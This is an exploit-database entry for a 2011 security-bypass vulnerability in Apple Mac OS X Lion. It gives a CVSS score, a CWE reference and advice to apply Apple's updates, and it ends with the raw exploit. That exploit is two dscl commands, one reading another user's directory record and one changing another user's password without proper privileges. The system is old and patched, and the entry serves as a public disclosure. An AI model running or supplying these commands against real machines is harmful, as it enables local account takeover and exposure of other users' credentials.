header-logo
Suggest Exploit
vendor:
Mac OS X Lion
by:
Unknown
5.5
CVSS
MEDIUM
Security bypass
264
CWE
Product Name: Mac OS X Lion
Affected Version From: Mac OS X Lion
Affected Version To: Mac OS X Lion
Patch Exists: YES
Related CWE:
CPE: o:apple:mac_os_x:10.7
Metasploit:
Other Scripts:
Platforms Tested: Mac
2011

Multiple security-bypass vulnerabilities in Apple Mac OS X Lion

Local attackers can exploit these issues to obtain sensitive information or change the password of other users on the computer, without sufficient privileges.

Mitigation:

Apply the latest security updates from Apple
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/49676/info

Apple Mac OS X Lion is prone to multiple security-bypass vulnerabilities.

Local attackers can exploit these issues to obtain sensitive information or change the password of other users on the computer, without sufficient privileges. 

$ dscl localhost -read /Search/Users/bob

$ dscl localhost -passwd /Search/Users/<username>